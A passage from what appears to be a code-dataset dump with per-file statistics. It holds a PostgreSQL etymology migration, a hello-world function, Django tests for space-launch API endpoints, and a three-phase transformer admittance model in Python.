(accept is null or P.accepted = accept) and
(publish is null or P.published = publish)
on conflict do nothing;
-- Temporary table for etymological tags.
create temporary table
if not exists
tag_table (
tag TEXT primary key)
on commit drop;
insert into tag_table
values (tag);
-- Temporary tables for tags to be processed.
create temporary table
if not exists
tag_list_a (
tag TEXT)
on commit drop;
create temporary table
if not exists
tag_list_b (
tag TEXT)
on commit drop;
-- Initial batch of additional tags.
with
tag_cte as (
insert into tag_table
select distinct E.content
from
public.entity E,
publishingentity P
where
(E.parent_client_id, E.parent_object_id) in (
select * from entry_id_table) and
E.field_client_id = entity_field_client_id and
E.field_object_id = entity_field_object_id and
E.marked_for_deletion = false and
P.client_id = E.client_id and
P.object_id = E.object_id and
(accept is null or P.accepted = accept) and
(publish is null or P.published = publish)
on conflict do nothing
returning *)
insert into tag_list_a
select * from tag_cte;
-- Gathering and returning linked lexical entries.
perform linked_cycle(
entity_field_client_id,
entity_field_object_id,
publish,
accept);
return query
select * from entry_id_table;
truncate table entry_id_table;
truncate table tag_table;
end;
$$ language plpgsql;
''')
op.execute('''
/*
* Non-deleted text fields, used for getting etymology text info, see
* etymology_text() and etymology_group_text().
*/
create materialized view
text_field_id_view as
select
client_id,
object_id
from field
where
data_type_translation_gist_client_id = 1 and
data_type_translation_gist_object_id = 47 and
marked_for_deletion = false;
create unique index
text_field_id_view_idx on
text_field_id_view (
client_id, object_id);
''')
op.execute('''
/*
* Returns aggregated text data of an etymologically linked lexical
* entry group.
*/
create or replace function
etymology_text(
tag TEXT,
publish BOOLEAN = true)
returns table (
content TEXT) as $$
begin
-- Returning data of each linked lexical entry.
return query
select
string_agg(E.content, '; ')
from
public.entity E,
publishingentity P
where
(E.parent_client_id, E.parent_object_id) in (
select * from linked_group(66, 25, tag, publish)) and
(E.field_client_id, E.field_object_id) in (
select * from text_field_id_view) and
E.marked_for_deletion = false and
E.content is not null and
P.client_id = E.client_id and
P.object_id = E.object_id and
P.accepted = true and
(publish is null or P.published = publish)
group by (
E.parent_client_id, E.parent_object_id);
end;
$$ language plpgsql;
''')
op.execute('''
/*
* Returns aggregated text data and lexical entry ids of an
* etymologically linked lexical entry group.
*/
create or replace function
etymology_group_text(
tag TEXT,
publish BOOLEAN = true)
returns table (
client_id BIGINT,
object_id BIGINT,
content TEXT) as $$
begin
-- Returning data of each linked lexical entry.
return query
select
E.parent_client_id,
E.parent_object_id,
string_agg(E.content, '; ')
from
public.entity E,
publishingentity P
where
(E.parent_client_id, E.parent_object_id) in (
select * from linked_group(66, 25, tag, publish)) and
(E.field_client_id, E.field_object_id) in (
select * from text_field_id_view) and
E.marked_for_deletion = false and
E.content is not null and
P.client_id = E.client_id and
P.object_id = E.object_id and
P.accepted = true and
(publish is null or P.published = publish)
group by (
E.parent_client_id, E.parent_object_id);
truncate table entry_id_table;
truncate table tag_table;
end;
$$ language plpgsql;
''')
def downgrade():
op.execute(
'drop function if exists linked_cycle(bigint, bigint, boolean, boolean);')
op.execute(
'drop function if exists linked_cycle_no_publishing(bigint, bigint);')
op.execute(
'drop function if exists linked_group(bigint, bigint, bigint, bigint, boolean, boolean);')
op.execute(
'drop function if exists linked_group_no_publishing(bigint, bigint, bigint, bigint, boolean, boolean);')
op.execute(
'drop function if exists linked_group(bigint, bigint, text, boolean, boolean);')
op.execute(
'drop materialized view if exists text_field_id_view;')
op.execute(
'drop function if exists etymology_text(text, boolean);')
op.execute(
'drop function if exists etymology_group_text(text, boolean);')
| 25.272295
| 112
| 0.530865
| 2,396
| 21,254
| 4.459933
| 0.071786
| 0.073367
| 0.021336
| 0.035561
| 0.926446
| 0.920176
| 0.910163
| 0.900524
| 0.878533
| 0.878533
| 0
| 0.005441
| 0.42058
| 21,254
| 840
| 113
| 25.302381
| 0.862282
| 0.007199
| 0
| 0.895652
| 0
| 0
| 0.972263
| 0.077806
| 0
| 0
| 0
| 0
| 0
| 1
| 0.003478
| false
| 0
| 0.003478
| 0
| 0.015652
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
3fac02411248ae6bff234ce2f00cc78b5e22bb71
| 41
|
py
|
Python
|
python-oo/examples/schoolofnet/string/str.py
|
marcelloti/COURSE-Iniciando-com-python
|
7fffd5bc3f5a8a8dd1d0cd2abb8b2e51ba9f0202
|
[
"MIT"
] | null | null | null |
python-oo/examples/schoolofnet/string/str.py
|
marcelloti/COURSE-Iniciando-com-python
|
7fffd5bc3f5a8a8dd1d0cd2abb8b2e51ba9f0202
|
[
"MIT"
] | null | null | null |
python-oo/examples/schoolofnet/string/str.py
|
marcelloti/COURSE-Iniciando-com-python
|
7fffd5bc3f5a8a8dd1d0cd2abb8b2e51ba9f0202
|
[
"MIT"
] | null | null | null |
def hello():
return ("Hello World!")
| 13.666667
| 27
| 0.585366
| 5
| 41
| 4.8
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.219512
| 41
| 2
| 28
| 20.5
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0.292683
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
3ff4f2a801e34dce974ed62942db41a45930eab5
| 7,421
|
py
|
Python
|
src/bot/tests/launches/test_launches_sln_310.py
|
ItsCalebJones/SpaceLaunchNow_API
|
09289068465c462557649172792ab0f41f833028
|
[
"Apache-2.0"
] | 11
|
2017-06-26T05:01:31.000Z
|
2019-09-13T18:48:27.000Z
|
src/bot/tests/launches/test_launches_sln_310.py
|
ItsCalebJones/SpaceLaunchNow_API
|
09289068465c462557649172792ab0f41f833028
|
[
"Apache-2.0"
] | 14
|
2019-01-30T23:13:34.000Z
|
2019-10-08T10:43:36.000Z
|
src/bot/tests/launches/test_launches_sln_310.py
|
ItsCalebJones/SpaceLaunchNow_API
|
09289068465c462557649172792ab0f41f833028
|
[
"Apache-2.0"
] | 5
|
2018-04-24T16:52:59.000Z
|
2018-08-22T14:06:01.000Z
|
import json
import unittest
from datetime import timedelta
from rest_framework import status
from api.models import *
from api.tests.test__base import LLAPITests, settings
class LaunchSLNv310Tests(LLAPITests):
@unittest.skipIf(settings.IS_LL, "Not supported in this configuration.")
def test_upcoming_normal(self):
"""
Ensure launch endpoints work as expected.
"""
# Test Normal endpoint
path = '/3.1.0/launch/upcoming/?limit=1'
response = self.client.get(path)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = json.loads(response.content.decode('utf-8'))
self.assertEqual(data['count'], Launch.objects.filter(net__gte=timezone.now() - timedelta(days=1)).filter(launch_library=True).count())
for data in data['results']:
launch = Launch.objects.get(launch_library_id=data['id'])
self.assertEqual(data['id'], launch.launch_library_id)
self.assertEqual(data['name'], launch.name)
self.assertNotIn('netstamp', data)
self.assertNotIn('isonet', data)
self.assertIn('name', data['status'])
self.check_permissions(path)
@unittest.skipIf(settings.IS_LL, "Not supported in this configuration.")
def test_upcoming_list(self):
"""
Ensure launch endpoints work as expected.
"""
# Test list endpoint
path = '/3.1.0/launch/upcoming/?limit=1&mode=list'
response = self.client.get(path)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = json.loads(response.content.decode('utf-8'))
self.assertEqual(data['count'], Launch.objects.filter(net__gte=timezone.now() - timedelta(days=1)).filter(launch_library=True).count())
for data in data['results']:
launch = Launch.objects.get(launch_library_id=data['id'])
self.assertEqual(data['id'], launch.launch_library_id)
self.assertEqual(data['name'], launch.name)
self.assertNotIn('netstamp', data)
self.assertNotIn('isonet', data)
self.assertIn('name', data['status'])
self.check_permissions(path)
@unittest.skipIf(settings.IS_LL, "Not supported in this configuration.")
def test_upcoming_detailed(self):
"""
Ensure launch endpoints work as expected.
"""
# Test detailed endpoint
path = '/3.1.0/launch/upcoming/?limit=1&mode=detailed'
response = self.client.get(path)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = json.loads(response.content.decode('utf-8'))
self.assertEqual(data['count'], Launch.objects.filter(net__gte=timezone.now() - timedelta(days=1)).filter(launch_library=True).count())
for data in data['results']:
launch = Launch.objects.get(launch_library_id=data['id'])
self.assertEqual(data['id'], launch.launch_library_id)
self.assertEqual(data['name'], launch.name)
self.assertNotIn('netstamp', data)
self.assertNotIn('isonet', data)
self.assertIn('name', data['status'])
if data['lsp']:
self.assertIn('founding_year', data['lsp'])
self.check_permissions(path)
@unittest.skipIf(settings.IS_LL, "Not supported in this configuration.")
def test_previous_normal(self):
"""
Ensure launch endpoints work as expected.
"""
# Test Normal endpoint
path = '/3.1.0/launch/previous/?limit=1'
response = self.client.get(path)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = json.loads(response.content.decode('utf-8'))
self.assertEqual(data['count'], Launch.objects.filter(net__lte=timezone.now()).filter(launch_library=True).count())
for data in data['results']:
launch = Launch.objects.get(launch_library_id=data['id'])
self.assertEqual(data['id'], launch.launch_library_id)
self.assertEqual(data['name'], launch.name)
self.assertNotIn('netstamp', data)
self.assertNotIn('isonet', data)
self.assertIn('name', data['status'])
self.check_permissions(path)
@unittest.skipIf(settings.IS_LL, "Not supported in this configuration.")
def test_previous_list(self):
"""
Ensure launch endpoints work as expected.
"""
# Test list endpoint
path = '/3.1.0/launch/previous/?limit=1&mode=list'
response = self.client.get(path)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = json.loads(response.content.decode('utf-8'))
self.assertEqual(data['count'], Launch.objects.filter(net__lte=timezone.now()).filter(launch_library=True).count())
for data in data['results']:
launch = Launch.objects.get(launch_library_id=data['id'])
self.assertEqual(data['id'], launch.launch_library_id)
self.assertEqual(data['name'], launch.name)
self.assertNotIn('netstamp', data)
self.assertNotIn('isonet', data)
self.assertIn('name', data['status'])
self.check_permissions(path)
@unittest.skipIf(settings.IS_LL, "Not supported in this configuration.")
def test_previous_detailed(self):
"""
Ensure launch endpoints work as expected.
"""
# Test detailed endpoint
path = '/3.1.0/launch/previous/?limit=1&mode=detailed'
response = self.client.get(path)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = json.loads(response.content.decode('utf-8'))
self.assertEqual(data['count'], Launch.objects.filter(net__lte=timezone.now()).filter(launch_library=True).count())
for data in data['results']:
launch = Launch.objects.get(launch_library_id=data['id'])
self.assertEqual(data['id'], launch.launch_library_id)
self.assertEqual(data['name'], launch.name)
self.assertNotIn('netstamp', data)
self.assertNotIn('isonet', data)
self.assertIn('founding_year', data['lsp'])
self.assertIn('name', data['status'])
self.check_permissions(path)
@unittest.skipIf(settings.IS_LL, "Not supported in this configuration.")
def test_launch_with_landings(self):
launch = Launch.objects.get(launch_library_id=864)
path = '/3.1.0/launch/864/'
response = self.client.get(path)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = json.loads(response.content.decode('utf-8'))
self.assertNotIn('next', data)
self.assertNotIn('result', data)
self.assertNotIn('previous', data)
self.assertNotIn('count', data)
self.assertEqual(data['id'], launch.launch_library_id)
self.assertEqual(data['name'], launch.name)
self.assertIn('slug', data)
self.assertEqual(data['status']['id'], launch.status.id)
self.assertNotIn('netstamp', data)
self.assertNotIn('wsstamp', data)
self.assertNotIn('westamp', data)
self.assertIn('net', data)
self.assertIn('window_end', data)
self.assertIn('window_start', data)
self.assertNotIn('isonet', data)
self.assertNotIn('isostart', data)
self.assertNotIn('isoend', data)
| 44.437126
| 143
| 0.640345
| 882
| 7,421
| 5.272109
| 0.111111
| 0.090323
| 0.085806
| 0.05871
| 0.888817
| 0.886022
| 0.869892
| 0.851183
| 0.851183
| 0.847742
| 0
| 0.011604
| 0.221938
| 7,421
| 166
| 144
| 44.704819
| 0.793731
| 0.050937
| 0
| 0.709677
| 0
| 0
| 0.137141
| 0.033923
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.056452
| false
| 0
| 0.048387
| 0
| 0.112903
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b748b7520b3cc02a84224d53b7028891fb039ffb
| 16,743
|
py
|
Python
|
pydgrid/transformers.py
|
pydgrid/pydgrid
|
c56073c385f42883c79333533f7cfb8383a173aa
|
[
"MIT"
] | 15
|
2019-01-29T08:22:39.000Z
|
2022-01-13T20:41:32.000Z
|
pydgrid/transformers.py
|
pydgrid/pydgrid
|
c56073c385f42883c79333533f7cfb8383a173aa
|
[
"MIT"
] | 1
|
2017-11-28T21:34:52.000Z
|
2017-11-28T21:34:52.000Z
|
pydgrid/transformers.py
|
pydgrid/pydgrid
|
c56073c385f42883c79333533f7cfb8383a173aa
|
[
"MIT"
] | 4
|
2018-02-15T02:12:47.000Z
|
2020-02-16T17:52:15.000Z
|
# -*- coding: utf-8 -*-
"""
Created on Sun Mar 5 13:04:45 2017
@author: jmmauricio
"""
import numpy as np
import difflib
def trafo_yprim(S_n,U_1n,U_2n,Z_cc,connection='Dyg11'):
'''
Trafo primitive as developed in: (in the paper Ynd11)
R. C. Dugan and S. Santoso, “An example of 3-phase transformer modeling for distribution system analysis,”
2003 IEEE PES Transm. Distrib. Conf. Expo. (IEEE Cat. No.03CH37495), vol. 3, pp. 1028–1032, 2003.
'''
connections_list = ['Dyn1', 'Yy_3wires','Dyn5','Dyn11','Ygd5_3w','Ygd1_3w','Ygd11_3w','ZigZag','Dyg11_3w','Ynd11']
if connection not in connections_list:
closest_connection = difflib.get_close_matches(connection, connections_list)
print('Transformer connection "{:s}" not found, did you mean: "{:s}"?'.format(connection,closest_connection[0]))
if connection=='Dyn1':
z_a = 3*Z_cc*1.0**2/S_n
z_b = 3*Z_cc*1.0**2/S_n
z_c = 3*Z_cc*1.0**2/S_n
U_1 = U_1n
U_2 = U_2n/np.sqrt(3)
Z_B = np.array([[z_a, 0.0, 0.0],
[0.0, z_b, 0.0],
[0.0, 0.0, z_c],])
N_a = np.array([[ 1/U_1, 0],
[-1/U_1, 0],
[ 0, 1/U_2],
[ 0,-1/U_2]])
N_row_a = np.hstack((N_a,np.zeros((4,4))))
N_row_b = np.hstack((np.zeros((4,2)),N_a,np.zeros((4,2))))
N_row_c = np.hstack((np.zeros((4,4)),N_a))
N = np.vstack((N_row_a,N_row_b,N_row_c))
B = np.array([[ 1, 0, 0],
[-1, 0, 0],
[ 0, 1, 0],
[ 0,-1, 0],
[ 0, 0, 1],
[ 0, 0,-1]])
Y_1 = B @ np.linalg.inv(Z_B) @ B.T
Y_w = N @ Y_1 @ N.T
A_trafo = np.zeros((7,12))
A_trafo[0,0] = 1.0
A_trafo[0,9] = 1.0
A_trafo[1,1] = 1.0
A_trafo[1,4] = 1.0
A_trafo[2,5] = 1.0
A_trafo[2,8] = 1.0
A_trafo[3,2] = 1.0
A_trafo[4,6] = 1.0
A_trafo[5,10] = 1.0
A_trafo[6,3] = 1.0
A_trafo[6,7] = 1.0
A_trafo[6,11] = 1.0
if connection=='Yy_3wires':
z_a = 3*Z_cc*1.0**2/S_n
z_b = 3*Z_cc*1.0**2/S_n
z_c = 3*Z_cc*1.0**2/S_n
U_1 = U_1n/np.sqrt(3)
U_2 = U_2n/np.sqrt(3)
Z_B = np.array([[z_a, 0.0, 0.0],
[0.0, z_b, 0.0],
[0.0, 0.0, z_c],])
N_a = np.array([[ 1/U_1, 0],
[-1/U_1, 0],
[ 0, 1/U_2],
[ 0,-1/U_2]])
N_row_a = np.hstack((N_a,np.zeros((4,4))))
N_row_b = np.hstack((np.zeros((4,2)),N_a,np.zeros((4,2))))
N_row_c = np.hstack((np.zeros((4,4)),N_a))
N = np.vstack((N_row_a,N_row_b,N_row_c))
B = np.array([[ 1, 0, 0],
[-1, 0, 0],
[ 0, 1, 0],
[ 0,-1, 0],
[ 0, 0, 1],
[ 0, 0,-1]])
Y_1 = B @ np.linalg.inv(Z_B) @ B.T
Y_w = N @ Y_1 @ N.T
A_trafo = np.zeros((6,12))
A_trafo[0,0] = 1.0
A_trafo[1,4] = 1.0
A_trafo[2,8] = 1.0
A_trafo[3,2] = 1.0
A_trafo[4,6] = 1.0
A_trafo[5,10] = 1.0
if connection=='Dyn5':
z_a = Z_cc*1.0**2/S_n*3
z_b = Z_cc*1.0**2/S_n*3
z_c = Z_cc*1.0**2/S_n*3
U_1 = U_1n
U_2 = U_2n/np.sqrt(3)
Z_B = np.array([[z_a, 0.0, 0.0],
[0.0, z_b, 0.0],
[0.0, 0.0, z_c],])
N_a = np.array([[ 1/U_1, 0],
[-1/U_1, 0],
[ 0, 1/U_2],
[ 0,-1/U_2]])
N_row_a = np.hstack((N_a,np.zeros((4,4))))
N_row_b = np.hstack((np.zeros((4,2)),N_a,np.zeros((4,2))))
N_row_c = np.hstack((np.zeros((4,4)),N_a))
N = np.vstack((N_row_a,N_row_b,N_row_c))
B = np.array([[ 1, 0, 0],
[-1, 0, 0],
[ 0, 1, 0],
[ 0,-1, 0],
[ 0, 0, 1],
[ 0, 0,-1]])
Y_1 = B @ np.linalg.inv(Z_B) @ B.T
Y_w = N @ Y_1 @ N.T
A_trafo = np.zeros((7,12))
A_trafo[0,1] = 1.0
A_trafo[0,4] = 1.0
A_trafo[1,5] = 1.0
A_trafo[1,8] = 1.0
A_trafo[2,0] = 1.0
A_trafo[2,9] = 1.0
A_trafo[3,2] = 1.0
A_trafo[4,6] = 1.0
A_trafo[5,10] = 1.0
A_trafo[6,3] = 1.0
A_trafo[6,7] = 1.0
A_trafo[6,11] = 1.0
if connection=='Dyn11':
z_a = Z_cc*1.0**2/S_n*3
z_b = Z_cc*1.0**2/S_n*3
z_c = Z_cc*1.0**2/S_n*3
U_1 = U_1n
U_2 = U_2n/np.sqrt(3)
Z_B = np.array([[z_a, 0.0, 0.0],
[0.0, z_b, 0.0],
[0.0, 0.0, z_c],])
N_a = np.array([[ 1/U_1, 0],
[-1/U_1, 0],
[ 0, 1/U_2],
[ 0,-1/U_2]])
N_row_a = np.hstack((N_a,np.zeros((4,4))))
N_row_b = np.hstack((np.zeros((4,2)),N_a,np.zeros((4,2))))
N_row_c = np.hstack((np.zeros((4,4)),N_a))
N = np.vstack((N_row_a,N_row_b,N_row_c))
B = np.array([[ 1, 0, 0],
[-1, 0, 0],
[ 0, 1, 0],
[ 0,-1, 0],
[ 0, 0, 1],
[ 0, 0,-1]])
Y_1 = B @ np.linalg.inv(Z_B) @ B.T
Y_w = N @ Y_1 @ N.T
A_trafo = np.zeros((7,12))
A_trafo[0,1] = 1.0
A_trafo[0,4] = 1.0
A_trafo[1,5] = 1.0
A_trafo[1,8] = 1.0
A_trafo[2,0] = 1.0
A_trafo[2,9] = 1.0
A_trafo[3,3] = 1.0
A_trafo[4,7] = 1.0
A_trafo[5,11] = 1.0
A_trafo[6,2] = 1.0
A_trafo[6,6] = 1.0
A_trafo[6,10] = 1.0
if connection=='Ygd5_3w':
z_a = 3*Z_cc*1.0**2/S_n
z_b = 3*Z_cc*1.0**2/S_n
z_c = 3*Z_cc*1.0**2/S_n
U_1 = U_1n #
U_2 = U_2n*np.sqrt(3)
Z_B = np.array([[z_a, 0.0, 0.0],
[0.0, z_b, 0.0],
[0.0, 0.0, z_c],])
N_a = np.array([[ 1/U_1, 0],
[-1/U_1, 0],
[ 0, 1/U_2],
[ 0,-1/U_2]])
N_row_a = np.hstack((N_a,np.zeros((4,4))))
N_row_b = np.hstack((np.zeros((4,2)),N_a,np.zeros((4,2))))
N_row_c = np.hstack((np.zeros((4,4)),N_a))
N = np.vstack((N_row_a,N_row_b,N_row_c))
B = np.array([[ 1, 0, 0],
[-1, 0, 0],
[ 0, 1, 0],
[ 0,-1, 0],
[ 0, 0, 1],
[ 0, 0,-1]])
Y_1 = B @ np.linalg.inv(Z_B) @ B.T
Y_w = N @ Y_1 @ N.T
A_trafo = np.zeros((6,12))
A_trafo[0,0] = 1.0
A_trafo[1,4] = 1.0
A_trafo[2,8] = 1.0
A_trafo[3,3] = 1.0
A_trafo[3,6] = 1.0
A_trafo[4,7] = 1.0
A_trafo[4,10] = 1.0
A_trafo[5,2] = 1.0
A_trafo[5,11] = 1.0
if connection=='Ygd1_3w':
z_a = 3*Z_cc*1.0**2/S_n
z_b = 3*Z_cc*1.0**2/S_n
z_c = 3*Z_cc*1.0**2/S_n
U_1 = U_1n #
U_2 = U_2n*np.sqrt(3)
Z_B = np.array([[z_a, 0.0, 0.0],
[0.0, z_b, 0.0],
[0.0, 0.0, z_c],])
N_a = np.array([[ 1/U_1, 0],
[-1/U_1, 0],
[ 0, 1/U_2],
[ 0,-1/U_2]])
N_row_a = np.hstack((N_a,np.zeros((4,4))))
N_row_b = np.hstack((np.zeros((4,2)),N_a,np.zeros((4,2))))
N_row_c = np.hstack((np.zeros((4,4)),N_a))
N = np.vstack((N_row_a,N_row_b,N_row_c))
B = np.array([[ 1, 0, 0],
[-1, 0, 0],
[ 0, 1, 0],
[ 0,-1, 0],
[ 0, 0, 1],
[ 0, 0,-1]])
Y_1 = B @ np.linalg.inv(Z_B) @ B.T
Y_w = N @ Y_1 @ N.T
A_trafo = np.zeros((6,12))
A_trafo[0,0] = 1.0
A_trafo[1,4] = 1.0
A_trafo[2,8] = 1.0
A_trafo[3,2] = 1.0
A_trafo[3,11] = 1.0
A_trafo[4,3] = 1.0
A_trafo[4,6] = 1.0
A_trafo[5,7] = 1.0
A_trafo[5,10] = 1.0
if connection=='Ygd11_3w':
z_a = Z_cc*1.0**2/S_n
z_b = Z_cc*1.0**2/S_n
z_c = Z_cc*1.0**2/S_n
U_1 = U_1n #
U_2 = U_2n*np.sqrt(3)
Z_B = np.array([[z_a, 0.0, 0.0],
[0.0, z_b, 0.0],
[0.0, 0.0, z_c],])
N_a = np.array([[ 1/U_1, 0],
[-1/U_1, 0],
[ 0, 1/U_2],
[ 0,-1/U_2]])
N_row_a = np.hstack((N_a,np.zeros((4,4))))
N_row_b = np.hstack((np.zeros((4,2)),N_a,np.zeros((4,2))))
N_row_c = np.hstack((np.zeros((4,4)),N_a))
N = np.vstack((N_row_a,N_row_b,N_row_c))
B = np.array([[ 1, 0, 0],
[-1, 0, 0],
[ 0, 1, 0],
[ 0,-1, 0],
[ 0, 0, 1],
[ 0, 0,-1]])
Y_1 = B @ np.linalg.inv(Z_B) @ B.T
Y_w = N @ Y_1 @ N.T
A_trafo = np.zeros((6,12))
A_trafo[0,1] = 1.0
A_trafo[1,5] = 1.0
A_trafo[2,9] = 1.0
A_trafo[3,3] = 1.0
A_trafo[3,6] = 1.0
A_trafo[4,7] = 1.0
A_trafo[4,10] = 1.0
A_trafo[5,2] = 1.0
A_trafo[5,11] = 1.0
if connection=='ZigZag':
z_a = Z_cc*1.0**2/S_n*3
z_b = Z_cc*1.0**2/S_n*3
z_c = Z_cc*1.0**2/S_n*3
U_1 = U_1n #
U_2 = U_2n
Z_B = np.array([[z_a, 0.0, 0.0],
[0.0, z_b, 0.0],
[0.0, 0.0, z_c],])
N = np.zeros((12,6))
N[0,0] = 1.0/U_1
N[1,0] = -1.0/U_1
N[6,0] = -1.0/U_1
N[7,0] = 1.0/U_1
N[4,2] = 1.0/U_1
N[5,2] = -1.0/U_1
N[10,2] = -1.0/U_1
N[11,2] = 1.0/U_1
N[8,4] = 1.0/U_1
N[9,4] = -1.0/U_1
N[2,4] = -1.0/U_1
N[3,4] = 1.0/U_1
N[2,1] = 1.0/U_2
N[3,1] = -1.0/U_2
N[6,3] = 1.0/U_2
N[7,3] = -1.0/U_2
N[10,5] = 1.0/U_2
N[11,5] = -1.0/U_2
# 0 1 2 3 4 5
# 0 Iw1a 1 Ia1 0
# 1 Iw2a -1 Ia2 1
# 2 Iw3a 2 Ib1 2
# 3 Iw4a -2 Ib2 3
# 4 Iw1b 1 Ic1 4
# 5 Iw2b -1 Ic2 5
# 6 Iw3b 2
# 7 Iw4b -2
# 8 Iw1c 1
# 9 Iw2c -1
#10 Iw3c 2
#11 Iw4c -2
# 0 1 2 3 4 5
# 0 Iw1a 1 Ia1 0
# 1 Iw2a -1 Ia2 1
# 2 Iw3a 2 -1 Ib1 2
# 3 Iw4a -2 -1 Ib2 3
# 4 Iw1b 1 Ic1 4
# 5 Iw2b -1 Ic2 5
# 6 Iw3b -1 2
# 7 Iw4b -1 -2
# 8 Iw1c 1
# 9 Iw2c -1
#10 Iw3c -1 2
#11 Iw4c -1 -2
B = np.array([[ 1, 0, 0],
[-1, 0, 0],
[ 0, 1, 0],
[ 0,-1, 0],
[ 0, 0, 1],
[ 0, 0,-1]])
Y_1 = B @ np.linalg.inv(Z_B) @ B.T
Y_w = N @ Y_1 @ N.T
A_trafo = np.zeros((7,12))
A_trafo[0,0] = 1.0
A_trafo[1,4] = 1.0
A_trafo[2,8] = 1.0
A_trafo[6,3] = 1.0
A_trafo[6,7] = 1.0
A_trafo[6,11] = 1.0
if connection=='Dyg11_3w':
z_a = 3*Z_cc*1.0**2/S_n
z_b = 3*Z_cc*1.0**2/S_n
z_c = 3*Z_cc*1.0**2/S_n
U_1 = U_1n
U_2 = U_2n/np.sqrt(3)
Z_B = np.array([[z_a, 0.0, 0.0],
[0.0, z_b, 0.0],
[0.0, 0.0, z_c],])
N_a = np.array([[ 1/U_1, 0],
[-1/U_1, 0],
[ 0, 1/U_2],
[ 0,-1/U_2]])
N_row_a = np.hstack((N_a,np.zeros((4,4))))
N_row_b = np.hstack((np.zeros((4,2)),N_a,np.zeros((4,2))))
N_row_c = np.hstack((np.zeros((4,4)),N_a))
N = np.vstack((N_row_a,N_row_b,N_row_c))
B = np.array([[ 1, 0, 0],
[-1, 0, 0],
[ 0, 1, 0],
[ 0,-1, 0],
[ 0, 0, 1],
[ 0, 0,-1]])
Y_1 = B @ np.linalg.inv(Z_B) @ B.T
Y_w = N @ Y_1 @ N.T
A_trafo = np.zeros((6,12))
A_trafo[0,1] = 1.0
A_trafo[0,4] = 1.0
A_trafo[1,5] = 1.0
A_trafo[1,8] = 1.0
A_trafo[2,0] = 1.0
A_trafo[2,9] = 1.0
A_trafo[3,3] = 1.0
A_trafo[4,7] = 1.0
A_trafo[5,11] = 1.0
# if connection=='Dyg11_3w':
# z_a = Z_cc*1.0**2/S_n
# z_b = Z_cc*1.0**2/S_n
# z_c = Z_cc*1.0**2/S_n
# U_1 = U_1n/np.sqrt(3)
# U_2 = U_2n
# Z_B = np.array([[z_a, 0.0, 0.0],
# [0.0, z_b, 0.0],
# [0.0, 0.0, z_c],])
# N_a = np.array([[ 1/U_1, 0],
# [-1/U_1, 0],
# [ 0, 1/U_2],
# [ 0,-1/U_2]])
# N_row_a = np.hstack((N_a,np.zeros((4,4))))
# N_row_b = np.hstack((np.zeros((4,2)),N_a,np.zeros((4,2))))
# N_row_c = np.hstack((np.zeros((4,4)),N_a))
#
# N = np.vstack((N_row_a,N_row_b,N_row_c))
#
# B = np.array([[ 1, 0, 0],
# [-1, 0, 0],
# [ 0, 1, 0],
# [ 0,-1, 0],
# [ 0, 0, 1],
# [ 0, 0,-1]])
#
# Y_1 = B @ np.linalg.inv(Z_B) @ B.T
# Y_w = N @ Y_1 @ N.T
# A_trafo = np.zeros((6,12))
#
# A_trafo[0,1] = 1.0
# A_trafo[0,4] = 1.0
# A_trafo[1,5] = 1.0
# A_trafo[1,8] = 1.0
# A_trafo[2,0] = 1.0
# A_trafo[2,9] = 1.0
#
# A_trafo[3,3] = 1.0
# A_trafo[4,7] = 1.0
# A_trafo[5,11] = 1.0
if connection=='Ynd11':
z_a = 3*Z_cc*1.0**2/S_n
z_b = 3*Z_cc*1.0**2/S_n
z_c = 3*Z_cc*1.0**2/S_n
U_1 = U_1n/np.sqrt(3)
U_2 = U_2n
Z_B = np.array([[z_a, 0.0, 0.0],
[0.0, z_b, 0.0],
[0.0, 0.0, z_c],])
B = np.array([[ 1, 0, 0],
[-1, 0, 0],
[ 0, 1, 0],
[ 0,-1, 0],
[ 0, 0, 1],
[ 0, 0,-1]])
N_a = np.array([[ 1/U_1, 0],
[-1/U_1, 0],
[ 0, 1/U_2],
[ 0,-1/U_2]])
N_row_a = np.hstack((N_a,np.zeros((4,4))))
N_row_b = np.hstack((np.zeros((4,2)),N_a,np.zeros((4,2))))
N_row_c = np.hstack((np.zeros((4,4)),N_a))
N = np.vstack((N_row_a,N_row_b,N_row_c))
Y_1 = B @ np.linalg.inv(Z_B) @ B.T
Y_w = N @ Y_1 @ N.T
A_trafo = np.zeros((7,12))
A_trafo[0,0] = 1.0
A_trafo[1,4] = 1.0
A_trafo[2,8] = 1.0
A_trafo[3,1] = 1.0
A_trafo[3,5] = 1.0
A_trafo[3,9] = 1.0
A_trafo[4,2] = 1.0
A_trafo[4,11] = 1.0
A_trafo[5,3] = 1.0
A_trafo[5,6] = 1.0
A_trafo[6,7] = 1.0
A_trafo[6,10] = 1.0
Y_prim = A_trafo @ Y_w @ A_trafo.T
return Y_prim
| 30.948244
| 120
| 0.339425
| 2,911
| 16,743
| 1.748884
| 0.046376
| 0.091141
| 0.06482
| 0.147712
| 0.859753
| 0.833628
| 0.813985
| 0.811236
| 0.807896
| 0.798468
| 0
| 0.173893
| 0.4848
